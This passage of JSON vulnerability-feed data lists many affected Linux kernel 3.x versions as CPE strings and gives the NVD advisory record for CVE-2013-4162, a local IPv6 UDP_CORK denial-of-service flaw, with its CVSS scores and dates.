"cpe:2.3:o:linux:linux_kernel:3.4.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.37:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.39:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.43:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.44:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.42:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.32:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.31:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.36:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.40:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.41:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.34:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.35:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.33:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.38:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc7:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:06:55", "description": "The udp_v6_push_pending_frames function in net/ipv6/udp.c in the IPv6 implementation in the Linux kernel through 3.10.3 makes an incorrect function call for pending data, which allows local users to cause a denial of service (BUG and system crash) via a crafted application that uses the UDP_CORK option in a setsockopt system call.", "edition": 6, "cvss3": {}, "published": "2013-07-29T13:59:00", "title": "CVE-2013-4162", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4162"], "modified": "2014-01-04T04:48:00", "cpe": ["cpe:/o:linux:linux_kernel:3.0.57", "cpe:/o:linux:linux_kernel:3.7", "cpe:/o:linux:linux_kernel:3.0.36", "cpe:/o:linux:linux_kernel:3.4.4", "cpe:/o:linux:linux_kernel:3.9", "cpe:/o:linux:linux_kernel:3.4.30", "cpe:/o:linux:linux_kernel:3.1.4", "cpe:/o:linux:linux_kernel:3.1.7", "cpe:/o:linux:linux_kernel:3.0.30", "cpe:/o:linux:linux_kernel:3.0.64", "cpe:/o:linux:linux_kernel:3.4.10", "cpe:/o:linux:linux_kernel:3.2.14", "cpe:/o:linux:linux_kernel:3.4.27", "cpe:/o:linux:linux_kernel:3.0.27", "cpe:/o:linux:linux_kernel:3.2.7", "cpe:/o:linux:linux_kernel:3.8.9", "cpe:/o:linux:linux_kernel:3.8.4", "cpe:/o:linux:linux_kernel:3.0.61", "cpe:/o:linux:linux_kernel:3.4.19", "cpe:/o:linux:linux_kernel:3.4.21", "cpe:/o:linux:linux_kernel:3.2.24", "cpe:/o:linux:linux_kernel:3.2.25", "cpe:/o:linux:linux_kernel:3.5.5", "cpe:/o:linux:linux_kernel:3.0.33", "cpe:/o:linux:linux_kernel:3.3.6", "cpe:/o:linux:linux_kernel:3.2.8", "cpe:/o:linux:linux_kernel:3.0.47", "cpe:/o:linux:linux_kernel:3.0.9", "cpe:/o:linux:linux_kernel:3.4.23", "cpe:/o:linux:linux_kernel:3.4.2", "cpe:/o:linux:linux_kernel:3.4.13", "cpe:/o:linux:linux_kernel:3.2.29", "cpe:/o:linux:linux_kernel:3.2.18", "cpe:/o:linux:linux_kernel:3.0.6", "cpe:/o:linux:linux_kernel:3.6.10", "cpe:/o:linux:linux_kernel:3.6.5", "cpe:/o:linux:linux_kernel:3.0.17", "cpe:/o:linux:linux_kernel:3.6", "cpe:/o:linux:linux_kernel:3.2.23", "cpe:/o:linux:linux_kernel:3.0.10", "cpe:/o:linux:linux_kernel:3.6.3", "cpe:/o:linux:linux_kernel:3.7.3", "cpe:/o:linux:linux_kernel:3.8.10", "cpe:/o:linux:linux_kernel:3.8.12", "cpe:/o:linux:linux_kernel:3.7.8", "cpe:/o:linux:linux_kernel:3.0.40", "cpe:/o:linux:linux_kernel:3.0.67", "cpe:/o:linux:linux_kernel:3.1.3", "cpe:/o:linux:linux_kernel:3.0.45", "cpe:/o:linux:linux_kernel:3.0.7", "cpe:/o:linux:linux_kernel:3.3", "cpe:/o:linux:linux_kernel:3.0.20", "cpe:/o:linux:linux_kernel:3.2.30", "cpe:/o:linux:linux_kernel:3.0.31", "cpe:/o:linux:linux_kernel:3.10.3", "cpe:/o:linux:linux_kernel:3.4.9", "cpe:/o:linux:linux_kernel:3.0.49", "cpe:/o:linux:linux_kernel:3.2.13", "cpe:/o:linux:linux_kernel:3.4.24", "cpe:/o:linux:linux_kernel:3.0.12", "cpe:/o:linux:linux_kernel:3.0.41", "cpe:/o:linux:linux_kernel:3.0.59", "cpe:/o:linux:linux_kernel:3.0.15", "cpe:/o:linux:linux_kernel:3.8.3", "cpe:/o:linux:linux_kernel:3.2.27", "cpe:/o:linux:linux_kernel:3.0.50", "cpe:/o:linux:linux_kernel:3.0.23", "cpe:/o:linux:linux_kernel:3.8.13", "cpe:/o:linux:linux_kernel:3.0.44", "cpe:/o:linux:linux_kernel:3.8.5", "cpe:/o:linux:linux_kernel:3.1.10", "cpe:/o:linux:linux_kernel:3.4.6", "cpe:/o:linux:linux_kernel:3.0.13", "cpe:/o:linux:linux_kernel:3.9.5", "cpe:/o:linux:linux_kernel:3.6.1", "cpe:/o:linux:linux_kernel:3.0.5", "cpe:/o:linux:linux_kernel:3.0.39", "cpe:/o:linux:linux_kernel:3.5.1", "cpe:/o:linux:linux_kernel:3.0.3", "cpe:/o:linux:linux_kernel:3.0.63", "cpe:/o:linux:linux_kernel:3.2.28", "cpe:/o:linux:linux_kernel:3.3.4", "cpe:/o:linux:linux_kernel:3.3.7", "cpe:/o:linux:linux_kernel:3.0.14", "cpe:/o:linux:linux_kernel:3.0.28", "cpe:/o:linux:linux_kernel:3.0.25", "cpe:/o:linux:linux_kernel:3.9.1", "cpe:/o:linux:linux_kernel:3.0.56", "cpe:/o:linux:linux_kernel:3.0.1", "cpe:/o:linux:linux_kernel:3.2.3", "cpe:/o:linux:linux_kernel:3.7.2", "cpe:/o:linux:linux_kernel:3.0.58", "cpe:/o:linux:linux_kernel:3.0.8", "cpe:/o:linux:linux_kernel:3.0.66", "cpe:/o:linux:linux_kernel:3.2.17", "cpe:/o:linux:linux_kernel:3.0.60", "cpe:/o:linux:linux_kernel:3.2.6", "cpe:/o:linux:linux_kernel:3.7.5", "cpe:/o:linux:linux_kernel:3.2.1", "cpe:/o:linux:linux_kernel:3.4.3", "cpe:/o:linux:linux_kernel:3.4.32", "cpe:/o:linux:linux_kernel:3.3.2", "cpe:/o:linux:linux_kernel:3.0.65", "cpe:/o:linux:linux_kernel:3.4.20", "cpe:/o:linux:linux_kernel:3.3.3", "cpe:/o:linux:linux_kernel:3.2.19", "cpe:/o:linux:linux_kernel:3.7.7", "cpe:/o:linux:linux_kernel:3.2.16", "cpe:/o:linux:linux_kernel:3.0.62", "cpe:/o:linux:linux_kernel:3.0.55", "cpe:/o:linux:linux_kernel:3.1.1", "cpe:/o:linux:linux_kernel:3.2.5", "cpe:/o:linux:linux_kernel:3.9.3", "cpe:/o:linux:linux_kernel:3.0.46", "cpe:/o:linux:linux_kernel:3.6.6", "cpe:/o:linux:linux_kernel:3.2.2", "cpe:/o:linux:linux_kernel:3.7.6", "cpe:/o:linux:linux_kernel:3.5.6", "cpe:/o:linux:linux_kernel:3.4.22", "cpe:/o:linux:linux_kernel:3.9.9", "cpe:/o:linux:linux_kernel:3.0.18", "cpe:/o:linux:linux_kernel:3.4.26", "cpe:/o:linux:linux_kernel:3.0.19", "cpe:/o:linux:linux_kernel:3.1.5", "cpe:/o:linux:linux_kernel:3.0.26", "cpe:/o:linux:linux_kernel:3.8.1", "cpe:/o:linux:linux_kernel:3.4", "cpe:/o:linux:linux_kernel:3.4.17", "cpe:/o:linux:linux_kernel:3.6.9", "cpe:/o:linux:linux_kernel:3.0.68", "cpe:/o:linux:linux_kernel:3.8.7", "cpe:/o:linux:linux_kernel:3.0.37", "cpe:/o:linux:linux_kernel:3.0.34", "cpe:/o:linux:linux_kernel:3.10.1", "cpe:/o:linux:linux_kernel:3.0", "cpe:/o:linux:linux_kernel:3.0.32", "cpe:/o:linux:linux_kernel:3.7.10", "cpe:/o:linux:linux_kernel:3.3.8", "cpe:/o:linux:linux_kernel:3.0.16", "cpe:/o:linux:linux_kernel:3.0.38", "cpe:/o:linux:linux_kernel:3.2.4", "cpe:/o:linux:linux_kernel:3.4.29", "cpe:/o:linux:linux_kernel:3.4.15", "cpe:/o:linux:linux_kernel:3.2.15", "cpe:/o:linux:linux_kernel:3.1.9", "cpe:/o:linux:linux_kernel:3.4.18", "cpe:/o:linux:linux_kernel:3.2.20", "cpe:/o:linux:linux_kernel:3.8.8", "cpe:/o:linux:linux_kernel:3.2.12", "cpe:/o:linux:linux_kernel:3.2.21", "cpe:/o:linux:linux_kernel:3.0.2", "cpe:/o:linux:linux_kernel:3.4.8", "cpe:/o:linux:linux_kernel:3.2.11", "cpe:/o:linux:linux_kernel:3.5.7", "cpe:/o:linux:linux_kernel:3.2.22", "cpe:/o:linux:linux_kernel:3.0.53", "cpe:/o:linux:linux_kernel:3.0.4", "cpe:/o:linux:linux_kernel:3.0.42", "cpe:/o:linux:linux_kernel:3.9.6", "cpe:/o:linux:linux_kernel:3.0.21", "cpe:/o:linux:linux_kernel:3.2.9", "cpe:/o:linux:linux_kernel:3.9.2", "cpe:/o:linux:linux_kernel:3.9.0", "cpe:/o:linux:linux_kernel:3.9.8", "cpe:/o:linux:linux_kernel:3.4.28", "cpe:/o:linux:linux_kernel:3.6.7", "cpe:/o:linux:linux_kernel:3.0.29", "cpe:/o:linux:linux_kernel:3.2", "cpe:/o:linux:linux_kernel:3.4.7", "cpe:/o:linux:linux_kernel:3.5.4", "cpe:/o:linux:linux_kernel:3.8.0", "cpe:/o:linux:linux_kernel:3.4.25", "cpe:/o:linux:linux_kernel:3.3.5", "cpe:/o:linux:linux_kernel:3.5.3", "cpe:/o:linux:linux_kernel:3.4.14", "cpe:/o:linux:linux_kernel:3.0.43", "cpe:/o:linux:linux_kernel:3.0.11", "cpe:/o:linux:linux_kernel:3.7.4", "cpe:/o:linux:linux_kernel:3.5.2", "cpe:/o:linux:linux_kernel:3.0.35", "cpe:/o:linux:linux_kernel:3.4.16", "cpe:/o:linux:linux_kernel:3.0.52", "cpe:/o:linux:linux_kernel:3.0.51", "cpe:/o:linux:linux_kernel:3.8.6", "cpe:/o:linux:linux_kernel:3.0.48", "cpe:/o:linux:linux_kernel:3.0.54", "cpe:/o:linux:linux_kernel:3.7.9", "cpe:/o:linux:linux_kernel:3.9.4", "cpe:/o:linux:linux_kernel:3.1", "cpe:/o:linux:linux_kernel:3.6.11", "cpe:/o:linux:linux_kernel:3.4.12", "cpe:/o:linux:linux_kernel:3.9.7", "cpe:/o:linux:linux_kernel:3.4.31", "cpe:/o:linux:linux_kernel:3.1.6", "cpe:/o:linux:linux_kernel:3.0.22", "cpe:/o:linux:linux_kernel:3.0.24", "cpe:/o:linux:linux_kernel:3.7.1", "cpe:/o:linux:linux_kernel:3.6.4", "cpe:/o:linux:linux_kernel:3.1.8", "cpe:/o:linux:linux_kernel:3.9.10", "cpe:/o:linux:linux_kernel:3.1.2", "cpe:/o:linux:linux_kernel:3.3.1", "cpe:/o:linux:linux_kernel:3.6.2", "cpe:/o:linux:linux_kernel:3.2.26", "cpe:/o:linux:linux_kernel:3.6.8", "cpe:/o:linux:linux_kernel:3.8.2", "cpe:/o:linux:linux_kernel:3.4.5", "cpe:/o:linux:linux_kernel:3.10.2", "cpe:/o:linux:linux_kernel:3.4.1", "cpe:/o:linux:linux_kernel:3.2.10", "cpe:/o:linux:linux_kernel:3.8.11", "cpe:/o:linux:linux_kernel:3.4.11"], "id": "CVE-2013-4162", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4162", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.9:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.53:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.68:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.37:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.47:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.39:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.31:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.43:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.44:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.59:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.62:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc5:*:*:*:*:*:*", 